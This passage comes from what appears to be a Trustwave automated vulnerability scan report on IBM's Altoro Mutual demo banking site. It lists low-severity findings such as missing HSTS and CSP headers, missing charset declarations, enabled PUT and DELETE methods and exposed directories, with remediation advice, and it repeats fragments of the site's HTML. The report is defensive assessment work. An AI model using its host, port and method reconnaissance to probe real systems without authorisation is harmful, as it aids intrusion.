href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 671 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 672 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 673 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
Consider utilizing strict Content-Security-Policy header option to
prevent Cross-Site Scripting issues.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
https://www.owasp.org/index.php/HTTP_Strict_Transport_Security
Evidence:
DetectionDetails: No HSTS implemented for HTTPS
Request: GET https://demo.testfire.net:8443/ HTTP/1.1
Upgrade-Insecure-Requests: 1
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 674 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Example of response header use-
Strict-Transport-Security: max-age=31536000
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
CPE: apache:tomcat
URI: /
Version: unknown
Remediation:
No remediation is required.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 675 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://65.61.137.117/my%20documents/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 676 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://65.61.137.117:8080/high_yield_investments.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 677 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
HTTP Response Code: 302
URL: http://demo.testfire.net:8080/admin/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 678 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: https://65.61.137.117:8443/high_yield_investments.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 679 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: https://65.61.137.117:8443/swagger/index.html
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 680 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 681 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 682 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 683 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://code.google.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 684 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
URL: https://demo.testfire.net/high_yield_investments.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 685 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: https://demo.testfire.net/retirement.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
339 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
cpe: cpe:/h:linksys:befw11s4
ip_address: 65.61.137.117
os_name: embedded
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 686 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 687 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/fl
ash/swflash.cab#version=6,0,0,0" width="
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 688 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
If external scripts are necessary to provide a particular service then get
the scripts from the third party, perform a review for functionality and
integrity and post it on a web server.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 689 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat
Reference:
http://www.openssl.org/docs/apps/ciphers.html
Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-SHA384
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-SHA256
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 690 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
No remediation is necessary.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat
Evidence:
Verified: true
Today: 2019-08-05 21:59:44 -0500
Start date: 2018-12-21 02:38:15 UTC
End date: 2019-12-21 03:08:14 UTC
Expired: false
Fingerprint: B0:46:07:6F:F1:C9:1D:08:80:C8:64:5F:53:D8:C9:BE
Subject: /C=CA/ST=Ontario/L=Ottawa/O=IBM/CN=altoromutual.com
Common name: altoromutual.com
Issuer: /C=US/O=Entrust, Inc./OU=See www.entrust.net/legal-
terms/OU=(c) 2012 Entrust, Inc. - for authorized use only/CN=Entrust
Certification Authority - L1K
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 691 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat
Evidence:
application_cpe: cpe:/a:apache:tomcat, cpe:/a:apache:tomcat
application_name: apache:tomcat, apache:tomcat
application_protocol: https
ip_address: 65.61.137.117
port_number: 443
ssl_enabled: true
transport_protocol: tcp
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 692 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: https://65.61.137.117/swagger/index.html
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 693 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: http://demo.testfire.net/my%20documents/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 694 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://demo.testfire.net:8080/swagger/index.html
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 695 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 696 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 697 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 698 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
https://www.owasp.org/index.php/Content_Security_Policy
Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET http://65.61.137.117:8080/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 699 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 700 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 701 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 702 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 703 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170" height="
128" /></center>
<br /><br/>
<b><a href="index.jsp?content=business_cards.htm">Business
Credit Cards</a></b><br />
You're always looking for ways to improve your company's bottom
line. You want to be informed, improve efficiency and control expenses.
Now, you can do it all - with a business credit card account from Altoro
Mutual.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 704 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<br />
<b><a href="index.jsp?content=business_retirement.htm"
>Retirement Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />
</td>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 705 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 706 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
Consider utilizing strict Content-Security-Policy header option to
prevent Cross-Site Scripting issues.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 707 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: http://65.61.137.117:8080/bank/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 708 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: http://65.61.137.117:8080/my%20documents/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 709 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
HTTP Response Code: 302
URL: https://demo.testfire.net:8443/admin/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
CPE: apache:tomcat
URI: /
Version: unknown
Remediation:
No remediation is required.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 710 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 711 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 712 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: https://65.61.137.117:443/bank/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
